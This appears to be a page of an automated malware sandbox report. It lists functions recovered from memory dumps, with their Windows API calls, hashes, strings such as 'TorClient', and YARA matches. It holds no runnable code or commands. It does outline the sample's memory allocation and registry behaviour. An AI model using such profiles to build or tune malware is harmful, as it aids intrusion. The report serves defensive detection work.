Instruction ID: 631cbda3eb2de82782e93d42fbc7d32e8710fd5cd751ebfba3397411be5eb9d6
Opcode Fuzzy Hash: bfd8d880db04c75425efb6f72b39f291bfc904ce1e3e3265cc5f6478b8037506
Instruction Fuzzy Hash: 5A416E71104301AFE721DF58DC81DABBBEAFF88750F504D2DF69892160DB31D9988B66

Uniqueness

Uniqueness Score: -1.00%

Function 001F275C, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,001F262A,?), ref: 001F2782

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

RegEnumKeyExA.KERNELBASE(?,?,?,001F262A,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,001F262A), ref: 001F27C9
WaitForSingleObject.KERNEL32(00000000,?,?,?,001F262A,?,001F262A,?,?,?,?,?,001F262A,?), ref: 001F2836
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,001F262A,?,?,?,?,001F9D1C,?,00000001), ref: 001F285E

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: d90ed57d3ef663c2f23d7034cead3828ffbeefb58746f83aa9776ace81e7ed13
Instruction ID: ba6fcf0cc412217896e11710947674ff1d6426a7846d5d0fedff58185ced4d70
Opcode Fuzzy Hash: d90ed57d3ef663c2f23d7034cead3828ffbeefb58746f83aa9776ace81e7ed13
Instruction Fuzzy Hash: 05310776C0011DABCF21ABA5DC859FEFBB9EF94350F10416AF616B2160D7744E81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B18CA2, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00B18CF4
memcpy.NTDLL(?,?,?,?,?,?), ref: 00B18D85
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B18DA0

Strings

Dec 21 2020, xrefs: 00B18D15

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: 96d42be8ab478a25c75743180d6ad1b7fe14c6b818d50df1db25b8b8e69ce586
Instruction ID: f495c81d06a4bddc2ec3eb1486bbe8561962f36ab3885bbce05a693422c42b09
Opcode Fuzzy Hash: 96d42be8ab478a25c75743180d6ad1b7fe14c6b818d50df1db25b8b8e69ce586
Instruction Fuzzy Hash: C8312F31E00219ABDB00DF94D881AEEB7F9FF58314F6401A9E915FB280DB71AA458B90

Uniqueness

Uniqueness Score: -1.00%

Function 001F259A, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(001FD234,00000001,00000000,00000040,00000001,?,001FC068,00000000,001FC040,?,?,?,001F9D1C,?,00000001,001F7299), ref: 001F25EB
SetEvent.KERNEL32(00000000,?,?,?,001F9D1C,?,00000001,001F7299,00000002,?,?,001F7299), ref: 001F25F8
Sleep.KERNELBASE(00000BB8,?,?,?,001F9D1C,?,00000001,001F7299,00000002,?,?,001F7299), ref: 001F2603
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,001F9D1C,?,00000001,001F7299,00000002,?,?,001F7299), ref: 001F260A

Part of subcall function 001F275C: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,001F262A,?), ref: 001F2782
Part of subcall function 001F275C: RegEnumKeyExA.KERNELBASE(?,?,?,001F262A,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,001F262A), ref: 001F27C9
Part of subcall function 001F275C: WaitForSingleObject.KERNEL32(00000000,?,?,?,001F262A,?,001F262A,?,?,?,?,?,001F262A,?), ref: 001F2836
Part of subcall function 001F275C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,001F262A,?,?,?,?,001F9D1C,?,00000001), ref: 001F285E

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
String ID:
API String ID: 780868161-0
Opcode ID: 1e669c4c7b47a1c4d6482e149883e93cfa6a93cb12a628428517a8b1405b1847
Instruction ID: e912ae5c2d40e1ffa3dd84a84615ae0a0b39153b450e4f4a87670c1bda6c4cd7
Opcode Fuzzy Hash: 1e669c4c7b47a1c4d6482e149883e93cfa6a93cb12a628428517a8b1405b1847
Instruction Fuzzy Hash: 02215E72D0121DABCB20AFE488859BEB7A9AB58360B054529FB11E7140DB30DD46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F4C35, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000C8), ref: 001F4C63
lstrlenW.KERNEL32(?), ref: 001F4C99
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 001F4CBA
SysFreeString.OLEAUT32(?), ref: 001F4CCE

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 0df2a06d260c8b4fee7da8ab2c74ca1a4d38c2cef35860c1413a917b22760cd3
Instruction ID: f5d479db4dd60506716dd767891a11b1f49a7af4be788b21d48727cf51d28693
Opcode Fuzzy Hash: 0df2a06d260c8b4fee7da8ab2c74ca1a4d38c2cef35860c1413a917b22760cd3
Instruction Fuzzy Hash: CD214F75A0120DEFCB10DFA4D9889AEBBB9FF48344B108169EA45E7210EB30DA41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B1ED95, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(00B2E8CE,?,00000000,00B2E8CE,00000000,?,00000000,?,?,?,?,00B2E8CE,?,Client32,?,?), ref: 00B1EDBA
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B1EDD1
HeapFree.KERNEL32(00000000,00000000,?,?,?,00B2E8CE,?,Client32,?,?,?,00B215E7), ref: 00B1EDEC
RegQueryValueExA.KERNELBASE(00B2E8CE,?,00000000,00B2E8CE,00000000,?,?,?,?,00B2E8CE,?,Client32,?,?,?,00B215E7), ref: 00B1EE0B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: b6d3a492fc1daaf939af19a2dcb7185dbf7e49cb896524bbf36ed224c65bfff1
Instruction ID: f06d10b0d833af99bef8ced1c182eb396ea5a9c00c6cee305a7ae66405b24f57
Opcode Fuzzy Hash: b6d3a492fc1daaf939af19a2dcb7185dbf7e49cb896524bbf36ed224c65bfff1
Instruction Fuzzy Hash: D3114CB6500118FFDB12DF94EC84CEEBBBDEB89750B2040A6FD11A7110DA719E81DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B21F00, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00B3E088,00000000,00B1D9F2,?,00B19809,?), ref: 00B21F1F
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00B3E088,00000000,00B1D9F2,?,00B19809,?), ref: 00B21F2A
_wcsupr.NTDLL ref: 00B21F37
lstrlenW.KERNEL32(00000000), ref: 00B21F3F

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: 4736debda77d39cb4d6d12fa935730e6fbedadc6846383b4be7ff14b320b18b7
Instruction ID: 0b502771bea32334b35adacd3b50a75519a924378c84bcddf1bd3808238f0769
Opcode Fuzzy Hash: 4736debda77d39cb4d6d12fa935730e6fbedadc6846383b4be7ff14b320b18b7
Instruction Fuzzy Hash: A8F0E9352056212F93126B797EC9A6FA9D8FBD9B90B300879F529D3150CFA4CC019561

Uniqueness

Uniqueness Score: -1.00%

Function 00B2046A, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B20489

Part of subcall function 00B2B674: RtlEnterCriticalSection.NTDLL(00000000), ref: 00B2B680
Part of subcall function 00B2B674: CloseHandle.KERNEL32(?), ref: 00B2B68E
Part of subcall function 00B2B674: RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B2B6AA

CloseHandle.KERNEL32(?), ref: 00B20497
InterlockedDecrement.KERNEL32(00B3DF5C), ref: 00B204A6

Part of subcall function 00B325A3: SetEvent.KERNEL32(000003C4,00B204C1), ref: 00B325AD
Part of subcall function 00B325A3: CloseHandle.KERNEL32(000003C4), ref: 00B325C2
Part of subcall function 00B325A3: HeapDestroy.KERNELBASE(05380000), ref: 00B325D2

RtlExitUserThread.NTDLL(00000000), ref: 00B204C2

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1141245775-0
Opcode ID: 2123746b0d23dfd77dae307120871713e1cec5b367cca80c056eeb533a830e8f
Instruction ID: da0ac3bb1b818cb7f3f14f205ad1ea394c6a9cb246400726fb8e54dd70bd6d9f
Opcode Fuzzy Hash: 2123746b0d23dfd77dae307120871713e1cec5b367cca80c056eeb533a830e8f
Instruction Fuzzy Hash: 1CF0A430651610ABD7456B68EC4AA5D3BF8EF45730F200399F529932D0DFB49A018B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B244DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1810A: RegCreateKeyA.ADVAPI32(80000001,05778900,?), ref: 00B1811F
Part of subcall function 00B1810A: lstrlen.KERNEL32(05778900,00000000,00000000,?,?,00B279A9,00000000,?), ref: 00B1814D

RegQueryValueExA.KERNELBASE(?,Client,00000000,00B120D2,00B3D06C,?,00000001,?,73BCF710,00000000,00000000,00B120D2,?), ref: 00B24527
RegCloseKey.ADVAPI32(?), ref: 00B24572

Strings

Client, xrefs: 00B2450E, 00B24520, 00B24562, 00B24591

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID: Client
API String ID: 971780412-3236430179
Opcode ID: f58e8a912e565956ddd7d95bdc9c39d9d2610c64c944dc60b0e8592c9c620e2d
Instruction ID: 37f4f5a2bb880fd71e8f9e6b9b7a1155a99589ad51769ce1d31c1fdd7f3d17fa
Opcode Fuzzy Hash: f58e8a912e565956ddd7d95bdc9c39d9d2610c64c944dc60b0e8592c9c620e2d
Instruction Fuzzy Hash: E821FD75D40218EFDB109FA5FC15BAE7BF8EB14B10F2041A6F644A7190DB749A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B1DBF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1810A: RegCreateKeyA.ADVAPI32(80000001,05778900,?), ref: 00B1811F
Part of subcall function 00B1810A: lstrlen.KERNEL32(05778900,00000000,00000000,?,?,00B279A9,00000000,?), ref: 00B1814D

RegQueryValueExA.KERNELBASE(?,System,00000000,?,?,?,00000001,?,73BCF710,00000000,?,?,?,00B120D2,?), ref: 00B1DC2E
RegCloseKey.ADVAPI32(?,?,?,?,00B120D2,?), ref: 00B1DC82

Strings

System, xrefs: 00B1DC1E, 00B1DC23, 00B1DC5C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID: System
API String ID: 971780412-3470857405
Opcode ID: 9b169889a985857d26aa5841080aed8763400dca22b2f382d1aaeb0614708e62
Instruction ID: 285cb499e2e50c1e098a0a339d058ba887a3a3a2bc66ebc3aa2ce3b99f17219a
Opcode Fuzzy Hash: 9b169889a985857d26aa5841080aed8763400dca22b2f382d1aaeb0614708e62
Instruction Fuzzy Hash: 25110D76D00118FADB10ABA5DC45BEEBBB8EB44710F5044A6E514B3191E7709A44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E3A4, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B2E3CA
memcpy.NTDLL ref: 00B2E3F2

Part of subcall function 00B19DAC: NtAllocateVirtualMemory.NTDLL(00B329D7,00000000,00000000,00B329D7,00003000,00000040), ref: 00B19DDD
Part of subcall function 00B19DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B19DE4
Part of subcall function 00B19DAC: SetLastError.KERNEL32(00000000), ref: 00B19DEB

GetLastError.KERNEL32(00000010,00000218,00B36DDD,00000100,?,00000318,00000008), ref: 00B2E409
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00B36DDD,00000100), ref: 00B2E4EC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
String ID:
API String ID: 685050087-0
Opcode ID: 701b9dafe1af6a96f45d3acd4fd9b883e15a3514aa7e537bd57a51d725af91a6
Instruction ID: 260c350a29b4854acc456fa26fc492eeaa04ec95619cbd19a85e734412af0193
Opcode Fuzzy Hash: 701b9dafe1af6a96f45d3acd4fd9b883e15a3514aa7e537bd57a51d725af91a6
Instruction Fuzzy Hash: EC4192B1604301AFD724EF25DC41B9BB7E8FB58710F10896DF9ADC6291E730D9148B62

Uniqueness

Uniqueness Score: -1.00%

Function 001F9574, Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 001F8480: IUnknown_QueryService.SHLWAPI(00000000,?,003FB658,001F95A4,?,?,?,?,?,?,?,?,?,?,?,001F95A4), ref: 001F854C

Part of subcall function 001F9FE7: IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 001FA024
Part of subcall function 001F9FE7: IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 001FA055

SysFreeString.OLEAUT32(00000000), ref: 001F965A
SysFreeString.OLEAUT32(00000000), ref: 001F9669
SysFreeString.OLEAUT32(00000000), ref: 001F9674

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: FreeQueryStringUnknown_$Interface_Proxy$Service
String ID:
API String ID: 1065143003-0
Opcode ID: fe2147870cb720accd9d1caf9408ca36a691fec9f9bad0a18ed33fd83c5a077b
Instruction ID: b953fbcdba51dfeb745f056b1d10d7c6cc4c9714f561031f6ba17a31130cedb9
Opcode Fuzzy Hash: fe2147870cb720accd9d1caf9408ca36a691fec9f9bad0a18ed33fd83c5a077b
Instruction Fuzzy Hash: DF314D72D0060DABDF01EFA8C948AAFB7BAEF49310F154465EE10EB120DB719D46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001F7790, Relevance: 4.6, APIs: 3, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 001F77B2
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001F77DD

Part of subcall function 001F90BA: GetTickCount.KERNEL32 ref: 001F90D1

HeapFree.KERNEL32(00000000,00000002,?,?,00000002,?), ref: 001F7857

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Heap$AllocateCountFreeTickwsprintf
String ID:
API String ID: 833768658-0
Opcode ID: 45e975b50ae8a19ded213809d21182c65dc8cf84e5fd0ab222b1da7c5b54ba56
Instruction ID: 1463368d70aeb857953aa5cf15c4424c9f67897990253cc2620269d0b1debd50
Opcode Fuzzy Hash: 45e975b50ae8a19ded213809d21182c65dc8cf84e5fd0ab222b1da7c5b54ba56
Instruction Fuzzy Hash: 0B314C7150010DEBCB01DF64ED88AFA3BBEFB08354F108026FA15A7251DB70E955DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001FA881, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F230C: lstrlenW.KERNEL32(?), ref: 001F2315
Part of subcall function 001F230C: memcpy.NTDLL(00000000,?,?,?,?), ref: 001F233F
Part of subcall function 001F230C: memset.NTDLL ref: 001F2353

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,?,00000000,?), ref: 001FA8D3
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 001FA8EF
RegCloseKey.ADVAPI32(00000000), ref: 001FA900

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 2aba1b5f3a7226328dff3bfb3ce5e9ea5c1ca3c101cb3ce58b1254d4aadd8402
Instruction ID: e9e07864ab123bd14e89db4c9385b2d835f8e7a12ae22d323310ae6de19a9561
Opcode Fuzzy Hash: 2aba1b5f3a7226328dff3bfb3ce5e9ea5c1ca3c101cb3ce58b1254d4aadd8402
Instruction Fuzzy Hash: 8C1157B250020CABDB11DBA4EC89FBE77BCBF44304F144069B709E6051DBB89A45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 001F6604, Relevance: 4.6, APIs: 3, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 001F662C
memcpy.NTDLL(?,?,?), ref: 001F6646
SafeArrayDestroy.OLEAUT32(?), ref: 001F667B

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: ArraySafe$CreateDestroymemcpy
String ID:
API String ID: 2364292842-0
Opcode ID: 944554365fbc872b9dc4f7f485df9c1670e93b3bf9ffbef02d3ad28e97357af9
Instruction ID: 009ae5a8cb986cf967fa7e6520e7108f6e77763ac6393333833ec7a5c041863f
Opcode Fuzzy Hash: 944554365fbc872b9dc4f7f485df9c1670e93b3bf9ffbef02d3ad28e97357af9
Instruction Fuzzy Hash: 4311577290010EBFDB109FA8DC09EEEBBB9EF04350F008021FA04E2061E7719A55DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F8134, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 001F9574: SysFreeString.OLEAUT32(00000000), ref: 001F965A

memset.NTDLL ref: 001F8158
GetLastError.KERNEL32 ref: 001F81A4

Strings

<, xrefs: 001F8169

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: ErrorFreeLastStringmemset
String ID: <
API String ID: 3585467799-4251816714
Opcode ID: eef83017d1a7dcaf46a4ba620e46b5dcbe213a28d14937f42cc4eaf7e4c95c0c
Instruction ID: 44951b1b6c16dc9fc33635b516d405459de9d65dd8551818c35ac0f0149bc53f
Opcode Fuzzy Hash: eef83017d1a7dcaf46a4ba620e46b5dcbe213a28d14937f42cc4eaf7e4c95c0c
Instruction Fuzzy Hash: C411F77190021CAFDB10EFA9D889BFE7BE8AB08394F148116FA05E6251DB749645CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B1810A, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,05778900,?), ref: 00B1811F
RegOpenKeyA.ADVAPI32(80000001,05778900,?), ref: 00B1812C
lstrlen.KERNEL32(05778900,00000000,00000000,?,?,00B279A9,00000000,?), ref: 00B1814D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 95b4576fa78b4112a13d349bf481a149a263ba3f91d640bf2da9e10c9ad67288
Instruction ID: 3603e83f406d0605d4f3788592cac3869d113b8c69dce3620360d2a59835d677
Opcode Fuzzy Hash: 95b4576fa78b4112a13d349bf481a149a263ba3f91d640bf2da9e10c9ad67288
Instruction Fuzzy Hash: 7CF09076004208FFEB109F91DC88EEF7BBCFF493A0F608056FD4696240EA709994C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B233D3, Relevance: 4.5, APIs: 3, Instructions: 33COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00B14655,00000000), ref: 00B233EE
IsWow64Process.KERNEL32(?,?,?,?,?,?,00B14655,00000000), ref: 00B233FF
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00B14655,00000000), ref: 00B23412

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Process$ChangeCloseFindNotificationOpenWow64
String ID:
API String ID: 3805842350-0
Opcode ID: e9600559f3db2321ac196217306fbdcd0f1b28d92a29d2e76e285dc9a403b5f7
Instruction ID: 0db479c7b25572655c5d1fb3df684b6a5411aa19ecc17cf111a65cb0de29edc9
Opcode Fuzzy Hash: e9600559f3db2321ac196217306fbdcd0f1b28d92a29d2e76e285dc9a403b5f7
Instruction Fuzzy Hash: 7CF05E71900624FF8712AF59DC0589EBAE8EB85B91B2081A5F908A3200EB348F019BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B325A3, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000003C4,00B204C1), ref: 00B325AD

Part of subcall function 00B1A87A: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00B325B8), ref: 00B1A8A3
Part of subcall function 00B1A87A: RtlDeleteCriticalSection.NTDLL(00B3E220), ref: 00B1A8D6
Part of subcall function 00B1A87A: RtlDeleteCriticalSection.NTDLL(00B3E240), ref: 00B1A8DD
Part of subcall function 00B1A87A: CloseHandle.KERNEL32(?,?,00B325B8), ref: 00B1A90C
Part of subcall function 00B1A87A: ReleaseMutex.KERNEL32(000003E4,00000000,?,?,?,00B325B8), ref: 00B1A91D
Part of subcall function 00B1A87A: FindCloseChangeNotification.KERNELBASE(?,?,00B325B8), ref: 00B1A929
Part of subcall function 00B1A87A: ResetEvent.KERNEL32(00000000,00000000,?,?,?,00B325B8), ref: 00B1A935
Part of subcall function 00B1A87A: CloseHandle.KERNEL32(?,?,00B325B8), ref: 00B1A941
Part of subcall function 00B1A87A: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00B325B8), ref: 00B1A947
Part of subcall function 00B1A87A: SleepEx.KERNEL32(00000064,00000001,?,?,00B325B8), ref: 00B1A95B
Part of subcall function 00B1A87A: HeapFree.KERNEL32(00000000,00000000,?,?,00B325B8), ref: 00B1A97E
Part of subcall function 00B1A87A: RtlRemoveVectoredExceptionHandler.NTDLL(00B505B8), ref: 00B1A9B7

CloseHandle.KERNEL32(000003C4), ref: 00B325C2
HeapDestroy.KERNELBASE(05380000), ref: 00B325D2

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Close$HandleSleep$CriticalDeleteEventHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
String ID:
API String ID: 891263893-0
Opcode ID: a199a02201200896932e90cc5d3bd3c001cbe4a7e96c0a619ac5388ee16254e7
Instruction ID: e76c6c75a16d2060c290518eb2b6045f693957aeb1e862e92dd58ee9815116c1
Opcode Fuzzy Hash: a199a02201200896932e90cc5d3bd3c001cbe4a7e96c0a619ac5388ee16254e7
Instruction Fuzzy Hash: A5E042706412019BEA549B75BC9DA5A37E9AB246427290454F809D31B0DE34EA899A22

Uniqueness

Uniqueness Score: -1.00%

Function 001F8480, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON

Download Yara Rule

APIs

IUnknown_QueryService.SHLWAPI(00000000,?,003FB658,001F95A4,?,?,?,?,?,?,?,?,?,?,?,001F95A4), ref: 001F854C
IUnknown_QueryService.SHLWAPI(00000000,?,003FB658,001F95A4,?,?,?,?,?,?,?,001F95A4,00000000,00000000,00000000,?), ref: 001F858A

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: 87ac59828ddbd18bbdffc256803d69819815f67832b14bf83c7883399244e486
Instruction ID: 88834b819bbd595a8c7a88b2ede4f83c98edbc82c5e086c7e9573be466ee94df
Opcode Fuzzy Hash: 87ac59828ddbd18bbdffc256803d69819815f67832b14bf83c7883399244e486
Instruction Fuzzy Hash: A2512F75900119AFDB00DFA8C888DFEB7B9FF4C314B158598EA15EB220DB31AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F8291, Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 001F833F
SysFreeString.OLEAUT32(?), ref: 001F834D

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: b1b302589894c3d51b0a4323b0664b19970a6ed09cedf8925c0b5a8a05f0365d
Instruction ID: 04f7840c94f5824410c311a5e837ba20ecaf06f0e3678cb8cf40c2e7323567f5
Opcode Fuzzy Hash: b1b302589894c3d51b0a4323b0664b19970a6ed09cedf8925c0b5a8a05f0365d
Instruction Fuzzy Hash: AC31ED7691010AEFCB05DF98D9848BE7BB5FF58344B24842DF60697220DB35D986CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F9FE7, Relevance: 3.1, APIs: 2, Instructions: 62COMMON

Download Yara Rule

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 001FA024
IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 001FA055

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 8b57bc2cd70a27ee929675d29ef092b40d4619393d12c39b52cc7106ee9e867f
Instruction ID: f328551137111e39e1398469dff5e545f0ff93a48cb6fca7fc9e9e03a9a01aa3
Opcode Fuzzy Hash: 8b57bc2cd70a27ee929675d29ef092b40d4619393d12c39b52cc7106ee9e867f
Instruction Fuzzy Hash: DE21F1B5900619AFCB00DBA4D848D6AB779FF89704B148684E905DB324DB35ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B19F4D, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
Part of subcall function 00B2672D: RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
Part of subcall function 00B2672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
Part of subcall function 00B2672D: RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

HeapFree.KERNEL32(00000000,?,?,Ini,?,?,73BCF710,00000000,00000000,?,?,?,00B358BA,?), ref: 00B19FDB

Part of subcall function 00B25B0D: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,00B319D8,00000000,00000001,-00000007,?,00000000), ref: 00B25B2F

Strings

Ini, xrefs: 00B19F5D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: Ini
API String ID: 1301464996-1327165576
Opcode ID: ff63ff66fa34518b3a3bd66b28a0deaf480409b9d27388dd4b51510b85279938
Instruction ID: 1a4e137fac073dd5d5f6a9c275d692e6a6e4b5b016b394d1205a1bfb163690ac
